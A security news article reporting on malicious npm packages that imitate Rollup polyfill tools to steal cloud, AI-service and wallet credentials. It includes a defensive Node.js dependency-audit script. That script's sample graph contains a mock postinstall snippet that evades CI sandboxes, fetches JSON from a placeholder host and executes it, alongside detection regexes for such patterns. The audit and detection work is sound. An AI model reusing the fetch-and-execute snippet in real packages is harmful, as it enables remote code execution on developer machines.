North Korea-linked npm packages impersonate Rollup polyfill tools to steal developer secrets
JFrog identified six packages using layered delivery chains to harvest credentials for AWS, Azure, Claude, Gemini, and cryptocurrency wallets from developer workstations
July 3, 2026 – 4:55 pm
TL;DR
Six malicious npm packages mimicking Rollup polyfill tools stole developer credentials and enabled remote access in a campaign linked to North Korean threat actors.
Security researchers at JFrog have uncovered a set of malicious npm packages that impersonate legitimate Rollup polyfill tooling to steal developer credentials and gain remote access to compromised machines. Two of the packages, named “rollup-packages-polyfill-core” and “rollup-runtime-polyfill-core”, closely resemble the genuine “rollup-plugin-polyfill-node” project in terms of:
- Description
- Repository metadata
- Package structure
All six packages have since been removed from the npm registry.
The attack utilizes a layered delivery chain designed to evade detection. This involves:
- First-stage packages installing hidden second-stage dependencies disguised as SVG utilities.
- These utilities then fetch a JSON object from a remote hosting service and execute its embedded payload.
JFrog notes that this structure, coupled with lookalike names, realistic metadata, and environment checks designed to avoid sandboxes and cloud development platforms, aligns with previous Lazarus-linked npm campaigns.
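The delivery chain and the lookalike naming described above can both be caught before `npm install` runs a single lifecycle script. The following is an added example, written for this article and not code from JFrog or from the campaign itself: a small Node.js audit that walks a resolved dependency graph, flags packages whose names share tokens with an allow-listed project, and statically scans whatever code an install hook would run for remote fetches, dynamic code execution and environment probing. The graph, the package names other than the ones named in the article, the script bodies, the allow list and the detection thresholds are all constructed for illustration.

```javascript
"use strict";

// Constructed, in-memory stand-in for a resolved dependency graph (what you
// would build from package-lock.json plus each package's manifest and the
// files its lifecycle scripts execute). Everything below is made up for the
// example; "svg-helper-tools" and its setup script are not real packages.
const SAMPLE_GRAPH = {
  "my-app": { deps: ["rollup-packages-polyfill-core", "svgo"], scripts: {}, installSource: "" },
  // First stage: lookalike name, clean-looking code, one extra dependency.
  "rollup-packages-polyfill-core": { deps: ["svg-helper-tools"], scripts: {}, installSource: "" },
  // Hidden second stage: a postinstall hook that fetches JSON and runs a field of it,
  // after bailing out when it thinks it is inside CI or a cloud dev environment.
  "svg-helper-tools": {
    deps: [],
    scripts: { postinstall: "node setup.js" },
    installSource: [
      "const https = require('https');",
      "if (process.env.CI || process.env.CODESPACES) process.exit(0);",
      "https.get('https://example.invalid/cfg.json', r => {",
      "  let b = ''; r.on('data', d => b += d);",
      "  r.on('end', () => { const j = JSON.parse(b); new Function(j.payload)(); });",
      "});",
    ].join("\n"),
  },
  // Benign control package.
  svgo: { deps: [], scripts: {}, installSource: "" },
};

// Assumed allow list of projects you actually intend to depend on.
const KNOWN_GOOD = ["rollup-plugin-polyfill-node", "rollup", "svgo"];

// Heuristic (assumption, tune for your allow list): split names on '-', '/', '@', '.';
// a package is a lookalike of an allow-listed one if it is not that package,
// starts with the same token and shares at least two tokens with it.
function lookalikeOf(name, knownGood = KNOWN_GOOD) {
  const toks = (s) => s.split(/[-/@.]/).filter(Boolean);
  const a = toks(name);
  for (const good of knownGood) {
    if (name === good) return null;
    const b = toks(good);
    if (a.length < 2 || b.length < 2 || a[0] !== b[0]) continue;
    const shared = a.filter((t) => b.includes(t)).length;
    if (shared >= 2) return good;
  }
  return null;
}

// Static signals in code a lifecycle hook runs. The regexes are illustrative;
// a production scanner would work on the parsed AST, not on source text.
const SIGNALS = [
  ["remote-fetch", /\b(https?\.(get|request)|fetch|axios)\s*\(/],
  ["dynamic-eval", /\b(eval|new\s+Function|vm\.runIn\w+|child_process)\b/],
  ["env-probe", /process\.env\.[A-Z_]+/],
];

function scanSource(src) {
  return SIGNALS.filter(([, re]) => re.test(src)).map(([label]) => label);
}

// Depth-first walk from the root. Returns one finding per package that trips
// a rule, with the dependency path that pulled it in, in visit order.
function auditGraph(graph, root) {
  const findings = [];
  const seen = new Set();
  const visit = (name, path) => {
    if (seen.has(name)) return;
    seen.add(name);
    const pkg = graph[name];
    if (!pkg) return;
    const reasons = [];
    const like = lookalikeOf(name);
    if (like) reasons.push(`lookalike:${like}`);
    const hooks = ["preinstall", "install", "postinstall"].filter((h) => pkg.scripts[h]);
    if (hooks.length) reasons.push(`lifecycle:${hooks.join(",")}`);
    reasons.push(...scanSource(pkg.installSource || ""));
    if (reasons.length) findings.push({ name, path: [...path, name].join(" > "), reasons });
    for (const d of pkg.deps) visit(d, [...path, name]);
  };
  visit(root, []);
  return findings;
}

// Stand-alone report over the constructed graph.
for (const f of auditGraph(SAMPLE_GRAPH, "my-app")) {
  console.log(`${f.path}\n  ${f.reasons.join(", ")}`);
}
```

Run against a real tree, the walk would be fed from the lockfile and each package's `scripts` block, and the scan would target the files those scripts invoke. Note what the combination buys you: a lifecycle hook on its own is common and benign, and a lookalike name on its own can be coincidence, but a package two hops down from a name that resembles your intended dependency, carrying a hook whose code fetches remote JSON and hands it to `new Function`, is exactly the shape reported here and is worth blocking with `npm install --ignore-scripts` until reviewed.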
Once executed, the malware grants attackers both collection and control capabilities over the infected machine. It steals data from web browsers and cryptocurrency wallets, captures clipboard content periodically, harvests specific file types, targets developer tool configurations for VS Code, Windsurf, and Cursor, and exfiltrates credentials for AWS, Microsoft Azure, Google Gemini and Anthropic Claude, along with SSH keys.
This campaign is not an isolated incident. In April, researchers at Panther documented a sustained Lazarus npm operation involving 108 malicious packages across 261 versions designed to deliver BeaverTail and OtterCookie—two known North Korean malware families associated with the Contagious Interview campaign. These latest packages share features with OtterCookie, including:
- Use of a forked keyboard and mouse control library for interactive remote terminal sessions, screenshot capture, and simulated user input on compromised Windows machines.
The recent disclosures highlight a broader trend of supply chain attacks targeting open-source package repositories. Separate reports from Checkmarx, SafeDep, and AWS researcher Chi Tran identify clusters of malicious packages across npm and PyPI that steal cloud credentials, cryptocurrency wallets, SSH keys, and developer secrets. Rollup plugins are commonly installed on developer workstations and in CI build pipelines, environments that have proven increasingly vulnerable to supply chain compromise and that often hold access to sensitive assets including source code, API keys, and project secrets.